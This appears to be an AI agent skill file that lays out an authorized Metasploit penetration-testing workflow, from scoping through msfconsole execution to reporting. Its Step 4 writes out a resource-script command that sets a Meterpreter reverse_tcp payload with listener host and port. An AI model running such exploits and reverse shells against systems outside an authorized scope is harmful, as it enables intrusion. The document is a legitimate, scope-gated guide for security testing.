OpenClaw Metasploit
Overview
Use this skill to run deterministic and auditable Metasploit workflows for authorized security testing.
Prefer a check-first workflow and generate repeatable .rc scripts via scripts/build_rc.py instead of ad hoc console typing.
Workflow Decision Tree
- Confirm authorization and scope before any technical step.
- Collect target facts: service, version, network position, and constraints.
- Select candidate modules and payloads using module-selection.md.
- Generate and review a resource script with
scripts/build_rc.py. - Execute in
msfconsolewithcheckbeforerunorexploit. - Validate outcome with session and artifact evidence.
- Produce a concise report with reproducible commands and findings.
Step 1: Confirm Scope and Safety
Require explicit confirmation of:
- Target ownership or testing authorization
- In-scope hosts, ports, and time window
- Forbidden techniques (DoS, persistence, data exfiltration)
If scope is unclear, stop and ask for clarification before proceeding.
Step 2: Build Target Context
Capture minimum actionable context:
- Host and network placement
- Service and version fingerprint
- Authentication state
- Environmental constraints (egress filtering, AV/EDR, uptime sensitivity)
Use this context to justify each module choice.
Step 3: Select Modules and Payloads
Use search and info in msfconsole to narrow candidates:
search type:exploit cve:2023 service:http
info exploit/linux/http/<module_name>
show options
show payloads
Choose modules by:
- Reliability and target compatibility
- Required options completeness
- Post-exploit objective fit (shell type, architecture, privilege level)
For common mappings and tradeoffs, read module-selection.md.
Step 4: Generate Resource Script
Generate reproducible execution scripts:
python3 scripts/build_rc.py \
--module exploit/linux/http/example_module \
--rhosts 10.10.10.15 \
--rport 8080 \
--payload linux/x64/meterpreter/reverse_tcp \
--lhost 10.10.10.5 \
--lport 4444 \
--set TARGETURI=/app \
--check \
--job \
--output run_example.rc
Review generated commands before execution:
- Confirm no out-of-scope hosts
- Confirm payload and listener values
- Confirm optional settings are intentional
Step 5: Execute in msfconsole
Run with logging enabled:
msfconsole -q -r run_example.rc
Inside msfconsole, verify:
checkoutput statusrunorexploitresultsessions -lvisibility
If exploitation fails, adjust one variable at a time and re-run.
Step 6: Validate and Capture Evidence
Minimum evidence set:
- Module path and key options
- Command/script used for execution
- Check result and exploit result
- Session details (type, user, host)
- Relevant non-sensitive proof artifacts
Use workflow.md for command-level checklists and reporting structure.
Step 7: Report
Produce output with:
- Objective and scope
- Reproducible steps
- Outcome and confidence
- Impact summary
- Recommended remediation and verification method
Keep reports concise and technically verifiable.
Resources
scripts/build_rc.py
Generate a repeatable Metasploit .rc resource script from structured options.
references/module-selection.md
Module and payload selection heuristics with common service mappings.
references/workflow.md
Command checklist for execution, troubleshooting loop, and report field requirements.